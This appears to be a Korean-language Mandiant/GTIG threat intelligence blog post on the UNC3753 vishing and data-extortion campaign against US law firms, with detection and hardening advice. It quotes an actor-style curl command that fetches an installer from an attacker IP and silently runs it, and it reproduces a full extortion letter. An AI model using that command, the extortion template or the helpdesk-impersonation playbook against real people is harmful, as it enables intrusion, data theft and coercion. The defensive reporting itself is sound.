콘텐츠로 이동하기
위협 인텔리전스

법률적 조언 구하기: 미국 로펌을 겨냥해 지속되는 정밀 타격 캠페인

2026년 6월 5일
Mandiant

Google Threat Intelligence Group

Mandiant Services

Stop attacks, reduce risk, and advance your security.

Contact Mandiant

해당 블로그의 원문은 2026년 6월 6일 Google Cloud 블로그(영문)에 게재되었습니다. 


작성자: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan


서론

2026년 1월부터 5월까지, 맨디언트(Mandiant)는 미국 전역의 전문 서비스, 법률, 금융 서비스 분야의 수십 개 조직을 표적으로 한 금융 목적의 데이터 탈취 협박 캠페인을 식별했습니다. 이 공격은 위협 클러스터인 UNC3753("Luna Moth", "Chatty Spider", "Silent Ransom Group"으로도 추적됨)에 의해 실행되었습니다.

UNC3753은 기업 인프라 환경에 대한 원격 접속 권한을 획득하기 위해 보이스 피싱(vishing)과 사회공학적 기법을 적극 활용합니다. 데이터 마이그레이션이나 인보이스 관련 이메일과 같은 빌미를 사용하여, 위협 행위자들은 IT 기술 지원 직원을 가장해 전화 통화를 시작하며 대상자가 화면 공유 세션을 수락하고 원격 모니터링 및 관리(RMM) 유틸리티를 다운로드하도록 설득합니다. 일단 기업 환경 내부에 진입하면, 이들은 직접 탐색을 수행해 매우 민감한 데이터의 위치를 파악하고 유출하거나, 피해자를 교묘히 조종하여 이러한 작업들을 자신들을 대신해 실행하도록 만듭니다. 이렇게 탈취된 데이터에는 대개 후속 협박 요구를 위한 독점적인 법률 계약서, 개인정보(PII) 및 금융 기록들이 포함됩니다.

특히, UNC3753과 연계된 것으로 추정되는 일부 사례에서 위협 행위자들은 피해자의 시스템에 물리적으로 직접 접근하기도 했습니다. 이러한 물리적 침투 사건에서 IT 기술자로 위장한 개인들이 기업 사무실로 직접 걸어 들어와 USB 저장 매체를 사용해 엔드포인트로부터 데이터를 직접 유출하려고 시도했습니다.

본 블로그 포스트는 최근 맨디언트 컨설팅의 사고 대응(Incident Response) 프로젝트 과정에서 드러난 이 위협 그룹의 기술적 수명 주기(Lifecycle)를 상세히 설명하고, 물리적 오피스 타겟팅과 같은 공격 전술들을 조명하며, 엔드포인트와 인프라를 안전하게 수호하기 위한 구체적인 권고 사항을 제공합니다.

위협 세부 정보

UNC3753 캠페인의 수명 주기는 고도로 최적화되고 빠른 템포로 가동되는 운영 모델을 반영합니다. 맨디언트가 조사한 많은 침해 사고에서 최초 대상자 접촉부터 데이터 탈취 및 협박에 이르는 전체 공격 시퀀스는 단 하루(1영업일) 안에 모두 완료되었습니다. 최근 맨디언트는 데이터 검색, 스테이징(Staging), 탈취가 최초 접속 후 단 1시간도 채 되지 않아 시작되는 것을 관찰했습니다.

이 위협 그룹은 흔히 위협 행위자가 직접 통제하는 개인 이메일 계정(Gmail 등)에서 발송된 무해한 인보이스 테마의 이메일을 유끼로 사용하여 캠페인을 개시합니다. 이 메시지들에는 활성화된 링크나 악성 첨부파일이 전혀 포함되어 있지 않습니다. 대신, 대개 다음과 같이 짧고 일반적인 메시지만 포함되어 있습니다: "안녕하세요, 어제 말씀드린 인보이스 파일입니다(hello, here is the invcoie we talked about yesterday)". 구글 위협 인텔리전스 그룹(GTIG)은 이러한 사전 이메일의 주된 목적이 가짜 명분(Pretext)을 형성하여 대상자의 내부 보안 우려를 부추김으로써, 뒤이어 감행될 실제 음성 통화(Vishing)에 더 쉽게 넘어가도록 유도하는 데 있다고 분석합니다.

https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fig1.max-1500x1500.png

그림 1: UNC3753 공격 수명 주

IT 헬프데스크 사칭을 통한 최초 침입 

UNC3753의 핵심 침입 메커니즘은 정밀 표적형 보이스 피싱(vishing)에 의존합니다. 맨디언트는 이 위협 그룹이 전화번호와 이메일 주소를 수집하기 위해, 주로 타깃 조직의 웹사이트에 공개적으로 기재된 모든 직급의 임직원들을 표적으로 삼는 것을 목격했습니다. 위협 행위자들은 조직의 내부 IT 헬프데스크나 보안팀 소속 직원으로 위장하여 해당 직원들에게 직접 전화를 겁니다.

발신자들은 타깃의 행동을 유도하기 위해 다양한 구두 지침을 사용합니다. 보안 문제를 해결하거나 기업 데이터 마이그레이션 프로젝트를 지원한다는 명목 하에 신뢰 관계를 쌓고, 타깃에게 화면 공유 세션에 참여하도록 유도합니다.

원격 화면 제어 및 정상 도구의 악용 

타깃이 통화에 반응하기 시작하면, 위협 행위자들은 사용자에게 화면 공유 애플리케이션을 다운로드하고 실행하도록 지시함으로써 기존의 자동화된 경계 보안 및 이메일 필터링 통제 시스템을 무력화하여 우회합니다.

화면 공유 유틸리티 

UNC3753은 타깃에게 Zoom, Microsoft 터미널 서비스(Terminal Services), Microsoft Teams, 빠른 지원(Quick Assist)을 포함한 내장형 서비스나 상용 서비스를 사용해 원격 데스크톱 및 지원 세션을 시작하도록 지시합니다. Teams를 매개로 이루어진 한 침해 사고에서는 위협 행위자가 3일의 기간에 걸쳐 동일한 타깃과 총 5차례의 개별 통화를 이어가기도 했습니다.

상용 RMM 에이전트

UNC3753은 타깃이 AnyDesk, Bomgar, 또는 Zoho Assist 설치 파일을 다운로드하도록 사회공학적으로 속여 보다 지속적인 액세스 권한을 설정하려고 빈번히 시도합니다. 한 침해 대응 프로젝트에서는 위협 행위자가 타깃에게 cURL 명령어를 통해 페이로드를 다운로드하고 실행하도록 설득하여 "SuperOps RMM 에이전트" 설치를 시도하기도 했습니다.

Privnote를 통한 메시지 전달 

위협 행위자들은 설치 링크와 명령어를 타깃에 전송하기 위해 웹 기반의 메모 자동 파괴 텍스트 유틸리티인 privnote[.]com을 일관되게 활용하고 있습니다. 이러한 우회 기법은 복사하여 붙여넣는 침투 경로가 엔드포인트 웹 브라우저나 채팅 기록에 영구적인 흔적을 남기지 않도록 보장합니다.

UNC3753 원격 세션에서 관찰된 cURL 명령어 스테이징 문자열 예시:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

인프라 내 피벗 및 로컬 스테이징

이전 침입 사례에서는 기업의 내부 자산에 접근하기 위해 BYOD(Bring Your Own Device) 원격 환경을 악용하기도 했습니다. 맨디언트 컨설팅의 여러 개별 사건에서, UNC3753은 타깃의 개인 BYOD 엔드포인트에 직접 Zoom 세션을 연결했습니다. 이렇게 해킹된 개인 노트북을 사용하여, 이들은 Windows 365(Windows365.exe)나 Citrix 클라이언트와 같은 네이티브 클라이언트 플랫폼을 활용해 기업의 가상 데스크톱 인프라(VDI)에 접근했습니다.

VDI 환경에 대한 접근 권한을 획득하면, 위협 행위자들은 기업 파일 시스템으로 피벗(이동)합니다:

 
  1. 시스템 정보 수집: 위협 행위자들은 로컬 디렉터리를 매핑하고, 활성화된 OneDrive 폴더를 열거하며, 매핑된 네트워크 드라이브를 크롤링합니다.

     
  2. 문서 관리 표적 수집: 위협 행위자들은 특정 법률 및 문서 저장 리포지토리를 표적으로 삼습니다.

     
  3. 키워드 검색 및 파일 스테이징: 위협 행위자들은 iManage 내부에서 세금 기록(W-2, W-9, 1099 양식), 감사 파일, 기업 고객 계약서, 사회보장번호(SSN) 등이 포함된 고도의 민감한 폴더의 위치를 찾기 위해 특정 키워드 검색 기능을 사용합니다. 이렇게 수집된 결과들은 주로 사용자의 다운로드(Downloads) 폴더나 네이티브 로밍(Roaming) 프로필 경로 내에서 타깃이 접근할 수 있는 하위 디렉터리로 컴파일되어 분류됩니다.

데이터 탈취 

UNC3753은 보안 제어 시스템을 우회하기 위해 다양한 방법으로 스테이징된 데이터를 유출합니다. 이들은 종종 설치가 필요 없는 포터블 버전의 WinSCP나 Rclone을 사용합니다. 다른 사례에서는 피해자의 웹 브라우저 내에서 직접 위협 행위자가 통제하는 개인용 파일 공유 계정에 직접 로그인한 뒤, 훔친 파일들을 일괄 업로드(batch upload)하기도 합니다.

  • 클라우드 스토리지 스테이징: 위협 행위자들은 타깃에게 지시하거나 직접 화면을 제어하여, 스테이징된 폴더들을 위협 행위자가 통제하는 개인용 파일 공유 계정으로 드래그 앤 드롭 하도록 만듭니다. 여러 침입 사례에서 데이터가 유출된 최종 대상 폴더는 피해 조직의 브랜드명을 그대로 모방해 명명되기도 했습니다.

  • FTP 유틸리티: 브라우저 기반 업로드가 엔드포인트 제어에 의해 제한될 경우, 위협 행위자들은 대용량 패키지를 유출하기 위해 주로 WinSCP와 같은 FTP 및 SFTP 클라이언트 바이너리를 다운로드합니다. 한 사건에서 이 위협 그룹은 타깃의 로컬 OneDrive 폴더에서 Google Drive 계정으로 1.7GB의 데이터를 유출한 뒤, VDI 세션으로 이동하여 WinSCP를 사용해 추가로 14.4GB를 유출했습니다. 구글은 이 활동과 연관된 드라이브 계정 및 자산들을 비활성화함으로써 해당 행위자에 대한 제재 조치를 취했습니다.

  • 이메일 전달: 위협 행위자들은 피해자가 내부 iManage 리포지토리에서 파일을 준비(stage)하도록 한 뒤, 타깃의 사서함에서 위협 행위자가 통제하는 개인 이메일 주소로 해당 파일들을 직접 전송하도록 지시하기도 했습니다.

위협 행위자의 협박 전술

이 위협 클러스터는 데이터를 성공적으로 탈취한 직후, 흔히 타깃 인프라 환경에서 이탈한 지 30분 이내에 이메일을 통해 브랜드명이 명시되지 않은 협박 통신문을 전달합니다.

이 극도로 공격적인 협박 편지는 대응 및 랜섬웨어 협상을 시작할 수 있도록 조직에 3일의 제한 기한을 부여합니다. 만약 피해 조직이 응답하지 않을 경우, 위협 행위자들은 데이터 유출 사실을 알리기 위해 타깃 기업의 직원들과 외부 고객들에게 직접 전화를 걸고 이메일을 보낼 것이라고 경고합니다. 협박 서한은 데이터 유출이 고객의 신뢰를 훼손하고, 막대한 규제 벌금을 초래할 것이며, 외부 고객들이 데이터 관리 부실을 이유로 피해 조직을 상대로 소송을 제기할 수 있음을 노골적으로 강조합니다. 또한, 후속 메시지의 일환으로 이 그룹은 탈취한 모든 아카이브 파일을 데이터 유출 사이트(DLS)인 LEAKEDDATA에 공개하겠다고 위협했습니다 

협박 이메일 샘플 (Sample Extortion Email)

제목: [피해 조직명]이 고객들의 기밀 데이터를 유출당했습니다. 매우 중요합니다!

안녕하세요.

우리는 귀하에게 [피해 조직명] 법인의 데이터베이스에 접근하여 매우 방대한 데이터 세트를 획득했음을 알리고자 합니다. 우리는 독점 및 기밀 파일을 노리고 수주 동안 여러 시스템을 통해 귀하의 네트워크에 상주해 왔으며, 우리가 찾고 있던 파일뿐만 아니라 수많은 고객의 데이터까지 확보할 수 있었습니다. <탈취한 문서의 전반적인 유형 언급>. 이는 장난이나 사기가 아닙니다.

이는 귀사의 존립을 위태롭게 만드는 실질적인 문제이며, 이를 증명하기 위해 우리는 해당 파일들을 소지하고 있음을 확인해 주는 스크린샷을 첨부했습니다.

우리의 이메일에 회신하시면 전체 파일 트리와 실제 파일들을 보여드리겠습니다.

우리는 이 비즈니스에 아주 오랫동안 종사해 온 엘리트 그룹으로, 우리가 데이터를 게시하는 자체 웹사이트를 보유하고 있으며 수천 명의 개인들이 우리의 활동을 추적하고 있고 다양한 비즈니스 소셜 미디어에도 연계되어 있습니다. 하지만 더 중요한 것은, 우리가 귀하의 데이터를 평화롭고 최대한 신속하게 반환하고 싶어 한다는 점입니다.

우리는 우리 서버로부터 귀하의 데이터베이스를 완전히 삭제할 것임을 보증하고, 파일을 삭제하는 비디오 증거를 제공할 것이며, 우리의 소통에 대한 프라이버시를 보장하고, 우리가 귀하의 네트워크에 어떻게 침투했는지와 우리가 찾아낸 취약점을 해결하는 방법이 담긴 보안 조언을 제공할 것입니다.

우리가 이 문제를 해결할 수 있도록 귀하는 우리에게 이메일을 보내 소통을 시작해야 합니다. 양측 모두가 수용할 수 있는 재무적 솔루션을 찾을 수 있기를 바랍니다.

우리를 무시하거나 합의에 도달하지 못할 경우, 우리는 귀사의 직원, 파트너 및 고객들에게 사실을 알린 후 귀사의 데이터를 공개할 것입니다. 정보 유출 및 계약 위반으로 인해 개인 및 법인들로부터 청구 소송을 받게 될 것이며, 귀사의 현재 거래들은 파기될 것입니다. 기자들과 언론들이 귀사의 문서를 파헤쳐 그 안에서 불일치 사항이나 위반 사항들을 찾아낼 것입니다. 귀사는 평판을 잃고 주가는 폭락할 것이며, 귀사는 결국 문을 닫을 수밖에 없을 것입니다.

우리가 데이터를 유출할 경우, 귀하의 데이터는 다크웹 상의 수많은 다른 해커들과 범죄자들뿐만 아니라 귀하의 경쟁사 및 적들에 의해서도 악용될 수 있음을 상기시켜 드립니다.

법 집행 기관은 귀하를 도울 수 없습니다. 우리는 그들의 사법권 밖에 있으며, 이미 모든 중요 데이터를 손에 넣었습니다. 그들은 그저 우리와 소통하지 말라고만 조언할 것이며, 귀사에게 가장 먼저 벌금을 부과하는 주체가 될 것입니다.

귀하가 연락하는 즉시 확보한 모든 파일들을 보여드릴 것이므로, 귀하는 이 문제의 심각성과 협상을 진행해야 하는 필요성을 완벽히 이해하게 될 것입니다.

우리의 소통은 합의 전후를 막론하고 100% 비공개로 유지됩니다. 이에 대한 증거 역시 보여드릴 수 있습니다.

모든 향후 소통은 이 이메일 주소를 통해 진행될 수 있습니다.

시간이 흘러가고 있으니 시간을 낭비하지 마십시오. 오늘 우리에게 연락하여 내일부터 귀사의 직원들에게 전화를 돌리는 일이 없도록 하십시오. 소통을 시작할 시간은 3일이 주어집니다.

위의 모든 사항을 확인해 주는 몇 가지 스크린샷을 첨부합니다. 이 이메일에 회신하시면 파일 트리를 전송해 드리겠습니다.

그림 2: UNC3753 협박 서한 예시

데이터 유출 사이트 (Data Leak Site)

https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fi3.max-1200x1200.png

그림 3: LEAKEDDATA 데이터 유출 사이트(일부 마스킹 및 크롭 처리됨)

물리적 접근이 수반된 UNC3753의 의심 활동

UNC3753은 주로 디지털 경로에 의존하지만, GTIG는 연계된 위협 행위자들이 물리적으로 현장에 직접 방문해 데이터를 유출하는 대담한 시도 역시 감행하고 있다고 분석합니다. 이러한 공격 전술의 에스컬레이션(고도화)은 Silent Ransom Group 위협 행위자들이 물리적으로 오피스에 침투해 외장 USB 저장 매체로 기업 데이터를 유출한 다수의 실제 사고 사례를 조명한 최근 FBI Cyber FLASH 경고 포털을 통해 강력히 입증되고 있습니다.

FBI 권고안에 따르면, 해커들은 원격 사회공학적 공격 시도가 실패할 경우 피해 조직의 실제 사무실 위치로 사람을 직접 파견합니다. 현장에 침투한 위협 행위자는 시스템 보안 문제를 조치하기 위해 기기의 이미징 작업을 수행하거나 로컬 백업을 생성해야 한다고 거짓 주장합니다. 그 후 이들이 엔드포인트 PC에 직접적인 접근 권한을 확보하게 되면, 외장 드라이브를 연결해 기업 기밀 데이터를 직접 탈취하려고 시도합니다.

비록 제한적인 포렌식 흔적과 이후 추가 협박 요구가 발생하지 않아 공식적인 속성 규명(Attribution)은 보류되었으나, GTIG는 공격 구도의 일치성, 발생 타임라인, 표적 산업군의 일치성을 토대로 이러한 물리적 침투 사건들이 UNC3753과 밀접하게 연관되어 있을 가능성이 매우 높다고 판단하고 있습니다.

속성 규명 (Attribution)

GTIG는 인프라 중복성, 도메인 등록 기관 추적 정보, 피해 대상 특징 분석, 타깃 스테이징 디렉터리 구성 방식 등을 종합 분석하여 이번 캠페인과 연관 사회공학적 작업의 배후가 UNC3753임을 규명했습니다. UNC3753(별칭: "Luna Moth", "Chatty Spider", "Silent Ransom Group(SRG)")은 최소 2022년 3월부터 왕성하게 활동해 온 금융 목적의 위협 클러스터입니다. 이들은 2021년 초에 발견되었던 "바자콜(Bazarcall)" 스타일의 캠페인을 수행한 위협 클러스터 UNC2686과 유사한 TTPs를 공유합니다. UNC3753은 2022년에 LOCKBIT.BLACK 랜섬웨어를 유포했으나, 이후로는 랜섬웨어 배포를 중단하고 탈취한 중요 파일을 자체 데이터 유출 사이트(DLS)인 LEAKEDDATA에 게시하겠다고 협박하는 '데이터 탈취 전용 익스토션(Extortion)' 작전으로 완전히 선회했습니다. 이 위협 클러스터는 BAZARLOADER 변종이나 TRICKBOT, URSNIF, SILENTNIGHT 등을 주로 활용했던 UNC2686과 달리 원격 모니터링 및 관리(RMM) 도구 사용에 비정상적일 정도로 크게 의존합니다. 초기 단계에서 UNC3753은 정기 구독 결제를 위장한 빌링 이메일 유끼(예: 위조된 소프트웨어 갱신 알림)를 활용했으며, 주로 공격자가 관리하는 콜센터 전화를 유도하기 위한 번호가 적힌 PDF 파일을 첨부했습니다. 그러나 2025년 3월을 기점으로 이들은 내부 IT 헬프데스크 직원을 가장해 직접 침투 전화를 거는 방식으로 전술을 대대적으로 개편했습니다.

침해 사고 해결 및 시스템 보안 강화

전화 기반의 보이스 피싱, 오피스 물리적 무단 침투 및 엔드포인트 기기의 제어권 탈취 시도를 차단하기 위해, GTIG는 기업 및 기관이 다음의 보안 제어 조치들을 즉각 도입할 것을 강력히 권장합니다.

사용자 교육 

UNC3753의 전술, 기법 및 침투 시나리오에 특화된 맞춤형 사용자 보안 인식 제고 교육을 긴밀히 설계하고 정기 시행하십시오.

물리적 접근 및 신원 검증 정책 

사무실을 방문하는 모든 외부 계약업체, 외주 기술 인력 및 시설 방문객을 대상으로 철저한 상호 검증(Out-of-band identity verification) 제어 절차를 시행하십시오. 다음의 물리적 통제 조치를 필수로 부과해야 합니다.

  • 방문객의 공식 신원 자격 증명서 및 사진이 부착된 신분증 제시를 의무화하십시오.

  • 안내 데스크 직원은 방문객에게 출입 권한을 부여하기 전에 모든 물리적 방문객 신분증을 스캔 및 시스템 로그에 안전 기록해야 합니다.

  • 방문을 주장하는 엔지니어의 일정이 실제 예약된 사전 작업 지시서(Work orders) 정보와 정확히 일치하는지, 검증된 해당 모기업 혹은 헬프데스크 담당 부서를 통해 즉시 크로스 체크하십시오.

  • 물리 기술 서비스를 수행하는 임시 직원은 기업 내부 보안 감독관(Corporate supervisor)과 항시 동행해야 한다는 엄격한 에스코트 정책을 시행하십시오.

원격 접속 조건부 액세스 제어 

회사 소유의 공인 기기만이 가상 데스크톱 인스턴스(VDI)나 가상 사설망(VPN) 기기에 인증 및 연결될 수 있도록 강력한 원격 접속 조건부 액세스 정책(Conditional access policies)을 시행하십시오. 이를 통해 잠재적인 RMM 사용 시도를 선제 파악하고 원천 통제할 수 있는 시각적 가시성을 크게 높일 수 있습니다.

엄격한 RMM 및 화면 공유 소프트웨어 제어 정책 시행 

비인가된 원격 모니터링, 관리 및 지원 유틸리티의 불법 설치 및 가동 행위를 탐지하고 차단할 수 있도록 전사 인프라 환경을 감사하십시오. 승인되지 않은 실행 파일의 가동을 철저히 차단하는 애플리케이션 제어 정책(예: Windows Defender Application Control 또는 서드파티 엔드포인트 차단 툴)을 강제하십시오. 아울러 기업들은 Zoom, Teams 등 검증된 사내 화상회의 솔루션 내부에서 승인되지 않은 대화형 화면 제어(screen-control) 기능의 가동 권한을 부분 제약하는 방안도 적극 검토해야 합니다.

엔드포인트 이동식 매체 차단 강화 

물리적 침투를 통한 원시 데이터 유출 경로를 완벽히 소멸시키기 위해, 전사 엔드포인트 장비의 모든 외부 USB 대용량 스토리지 장치에 대한 읽기/쓰기 기능을 즉시 비활성화하십시오. 그룹 정책 개체(GPOs) 또는 MDM 환경 설정을 강제 적용하여 다음 사항을 제한하십시오.

  • USB 저장 장치 무단 설치 제약

  • 이동식 미디어 액세스 거부

  • 가상 데스크톱(VDI) 접속을 활용하는 전사 엔드포인트 기기 및 개인 BYOD 기기 상의 광학 미디어(CD/DVD 등) 쓰기 기능 원천 차단

네트워크 모니터링 및 아웃바운드 송출 제어

의심스러운 데이터 유출 및 스테이징 동작이 발생하는지 방화벽 로그, 네트워크 트래픽 흐름 및 엔드포인트 실행 기록들을 철저히 상시 분석하십시오. 구체적 조치는 다음과 같습니다.

  • 승인되지 않은 외부 파일 공유 API 및 이메일 서비스 주소로 빠져나가는 아웃바운드 연결망을 원천 차단하거나 즉각 실시간 감지 알림을 띄우십시오.

  • 방화벽 로그 환경 설정에서 전송 바이트 수가 완벽히 기록되는 실시간 세션 로깅 기능이 상시 가동되고 있는지 즉각 확인하십시오.

  • 내부 VDI 노드 및 엔드포인트 기기에서 WinSCP나 Rclone을 이용해 대용량 데이터 전송을 유발하는 SSH 트래픽(포트 22)이 발생하는지 집중적으로 모니터링하십시오.

애플리케이션 로그 및 접근 제어 감사

핵심 기밀 문서 저장소에 대한 비정상적인 사용자 로그인 및 무단 접근 기록들을 심층 감사하여, 짧은 주기에 대량 파일 다운로드를 유발하는 벌크 하베스팅(bulk harvesting) 프로필을 식별하십시오.

  • iManage, SharePoint 및 기업 이메일 디렉터리 내에서 짧은 주기에 발생하는 다량의 파일 탐색, 이상 검색어 수치 급증 및 일시적인 대규모 파일 다운로드 행위를 실시간 탐지하고 경보를 송출하도록 전용 알림 시스템을 세밀히 튜닝하십시오.

  • iManage와 같이 비즈니스 운영상 결코 타협할 수 없는 중요 데이터 리포지토리 애플리케이션에 대한 다요소 인증(MFA) 설정을 의무 부과하십시오.

  • 개별 임직원이 VDI 가상 노드에 접근을 시도할 때 MFA 검증 절차를 필수로 강제하도록, 매우 촘촘한 BYOD 사내 인증 통제 가이드라인을 정비하십시오.

전망 및 시사점 

금융 이익을 노리는 영악한 해커들이 미국의 법률 및 전문 서비스 조직을 집요하게 표적화하는 트렌드는 업계 전반의 지속적이고 뼈아픈 안보 위험 요소입니다. 법률 서비스를 전문 제공하는 로펌들은 해커들에게 매우 값비싼 협박 표적입니다. 이들은 고객사들의 초민감 기업 거래 계약서, 합병 및 인수(M&A) 전략 청사진, 고객 기밀 기술 자산 및 핵심 재무 보고서 등의 기밀문서들을 가치가 농축된 아카이브 형태로 집중 보관하고 있기 때문입니다. 위협 그룹들은 법률을 다루는 조직들이 대외적인 이미지 실추 및 막대한 규제 벌금 처벌 수위에 극도로 취약하며, 자신들의 업계 평판을 온전히 지켜내기 위해 기밀 유출 협박에 굴복하여 비교적 조용히 협상금을 지불할 가능성이 가장 높은 집단이라는 비즈니스 생리를 영리하게 노리고 있습니다.

아울러 위협 행위자들은 사람의 취약성(human element)—특히 음성 지도를 활용한 고도의 실시간 대화 사회공학적 전술—을 파고들 때, 기업들이 애써 공들여 구축해 둔 강력한 기술적 보안 경계선, 웹 방화벽 게이트웨이 및 복잡한 MFA 통제선들을 손쉽게 돌파할 수 있음을 너무 잘 파악하고 있습니다.

마지막으로, IT 기술자로 위장해 실제 오피스로 당당히 들어오는 물리적 오피스 무단 무차별 침투 전술의 등장은 향후 대응해야 할 전반적인 안보 수준이 완전히 새로운 차원으로 격상되었음을 의미합니다. 수많은 기업들이 시스템 기반의 로그 감시 시스템 및 정교한 엔드포인트 감지망을 촘촘히 진화시켜 온 반면, 정작 오피스를 직접 가로막는 오피스 물리 보안 장벽은 대개 몇 가지 정형화된 행정 안내 원칙만으로 허술하게 보초를 서고 있는 경우가 다반사입니다. 따라서 모든 기업과 기관들은 이제 실제 빌딩 출입의 통제 권한 및 실물 엔드포인트 단말 기기의 하드웨어 잠금 정책 역시 사내 보안 인프라 수호의 동등한 최우선 뼈대로 간주하여 강력히 수호하는, 완벽하게 통합된 입체적 보안 태세(Unified security posture)로 획기적인 패러다임 전환을 이뤄내야 합니다.

데이터 유출 사이트 (DLS)

UNC3753은 탈취한 피해 기업의 신원 사명과 관련 민감 데이터들을 무단 공개해 압박하기 위해 다음의 웹 플랫폼을 악용하고 있습니다.

  • hxxps[:]//business-data-leaks[.]com

사칭 피싱 도메인

GTIG는 UNC3753 공격자들이 진행 중인 사회공학적 사칭 및 보이스 피싱 전술을 교묘히 뒷받침하기 위해, 피해 기업명을 앞뒤로 삽입해 등록한 다수의 사칭 인프라 피싱 도메인 등록 흔적을 식별했습니다.

  • <organization>-itdesk[.]com

  • <organization>-it[.]com

  • <organization>-helpdesk[.]com

침해 지표 (Indicators of Compromise, IOCs)

보다 넓은 보안 커뮤니티 전반에서 본 보고서에 기술된 침해 공격의 징후들을 신속히 사냥하고 탐지해 대응할 수 있도록 돕기 위해, 구글은 가입한 인증 사용자들을 대상으로 다운로드 및 조회가 가용한 GTI 컬렉션(GTI Collection) 페이지 내에 관련 주요 침해 지표(IOCs) 정보를 완벽히 통합하여 개방해 두고 있습니다.

지표 유형

침해 지표

IPv4 Address

192.236.147.131

IPv4 Address

192.236.147.138

IPv4 Address

193.141.60.212

IPv4 Address

192.236.154.158

IPv4 Address

192.236.146.173

IPv4 Address

174.169.162.62

IPv4 Address

64.94.84.97

Google Security Operations (SecOps)

구글 SecOps 고객은 Mandiant Intel Emerging Threats 규칙 팩을 통해 이러한 광범위한 카테고리 규칙 등을 이용할 수 있습니다. 블로그 게시물에서 언급된 활동은 구글 SecOps에서 다음 규칙 이름으로 탐지됩니다. 

  • Execute MSI Files Downloaded via Curl

  • Suspected Rclone Exfiltration

MITRE ATT&CK

전술

기법 ID

기법 이름

최초 침투

T1566.004

피싱: 스피어피싱 보이스 

T1133

외부 원격 서비스 

실행

T1204.002

사용자 실행: 악성 파일

T1059.001

명령 및 스크립팅 인터프리터: PowerShell 

T1059.003

명령 및 스크립팅 인터프리터: Windows 명령 셸

T1569.002

시스템 서비스: 서비스 실행

지속성 유지

T1053.005

예약된 작업/작업: 예약된 작업

T1547.001

부팅 또는 로그온 자동 시작 실행: 레지스트리 실행 키

방어 우회

T1036.005

위장: 정상적인 이름 또는 위치 일치

T1553.002

신뢰 제어 우회: 코드 서명

T1562.001

방어력 약화: 도구 비활성화 또는 수정

T1070.001

지표 제거: Windows 이벤트 로그 지우기

자격 증명 접근

T1003.001

OS 자격 증명 덤핑: LSASS 메모리

T1003.002

OS 자격 증명 덤핑: 보안 계정 관리자

탐색

T1083

파일 및 디렉터리 탐색

T1135

네트워크 공유 탐색

T1046

네트워크 서비스 탐색

측면 이동

T1219

원격 액세스 소프트웨어

T1021.001

원격 서비스: 원격 데스크톱 프로토콜

T1021.004

원격 서비스: SSH

수집

T1005

로컬 시스템의 데이터

명령 및 제어

T1572

프로토콜 터널링

유출

T1020

자동화된 유출 

T1567.002

웹 서비스를 통한 유출: 클라우드 스토리지로 유출

T1052.001

물리적 매체를 통한 유출

영향

T1486

영향을 주기 위한 데이터 암호화

게시 위치